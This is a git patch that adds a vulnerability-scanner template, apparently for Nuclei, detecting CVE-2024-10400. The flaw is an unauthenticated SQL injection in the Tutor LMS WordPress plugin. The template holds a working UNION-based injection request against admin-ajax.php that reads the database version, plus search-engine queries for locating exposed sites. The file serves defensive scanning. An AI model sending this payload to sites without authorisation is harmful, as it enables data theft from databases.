From e61785e228fc7184457c635f804508bb06a02157 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 18 Dec 2024 18:00:22 +0530
Subject: [PATCH 1/2] Create CVE-2024-10400.yaml

---
 http/cves/2024/CVE-2024-10400.yaml | 67 ++++++++++++++++++++++++++++++
 1 file changed, 67 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-10400.yaml

diff --git a/http/cves/2024/CVE-2024-10400.yaml b/http/cves/2024/CVE-2024-10400.yaml
new file mode 100644
index 00000000000..e41b646f944
--- /dev/null
+++ b/http/cves/2024/CVE-2024-10400.yaml
@@ -0,0 +1,67 @@
+id: CVE-2024-10400
+
+info:
+  name: Tutor LMS <= 2.7.6 - SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: high
+  description: |
+    The Tutor LMS plugin for WordPress is vulnerable to SQL Injection via the ‘rating_filter’ parameter in all versions up to, and including, 2.7.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor/tutor-lms-276-unauthenticated-sql-injection-via-rating-filter
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-10400
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-10400
+    cwe-id: CWE-89
+    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: themeum
+    product: tutor_lms
+    framework: wordpress
+    shodan-query: html:"/wp-content/plugins/tutor/"
+    fofa-query: body="/wp-content/plugins/tutor/"
+  tags: cve,cve2024,tutor-lms,lms,sqli
+
+variables:
+  num: '999999999'
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+    - type: regex
+      part: body
+      internal: true
+      name: nonce
+      group: 1
+      regex:
+        - '"_tutor_nonce":"([a-z0-9]+)"'
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        action=load_filtered_instructor&_tutor_nonce={{nonce}}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5({{num}}),version()),11,12,14--+-
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+          - '"success":true'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'alt=\\".*?:(.*?)\\"'

From 4f7b06b180a2b5516311e5364df218bf78e8ee43 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 18 Dec 2024 18:04:04 +0530
Subject: [PATCH 2/2] lint dfix

---
 http/cves/2024/CVE-2024-10400.yaml | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/http/cves/2024/CVE-2024-10400.yaml b/http/cves/2024/CVE-2024-10400.yaml
index e41b646f944..05ad8ea766a 100644
--- a/http/cves/2024/CVE-2024-10400.yaml
+++ b/http/cves/2024/CVE-2024-10400.yaml
@@ -35,13 +35,13 @@ http:
         Host: {{Hostname}}
 
     extractors:
-    - type: regex
-      part: body
-      internal: true
-      name: nonce
-      group: 1
-      regex:
-        - '"_tutor_nonce":"([a-z0-9]+)"'
+      - type: regex
+        part: body
+        internal: true
+        name: nonce
+        group: 1
+        regex:
+          - '"_tutor_nonce":"([a-z0-9]+)"'
 
   - raw:
       - |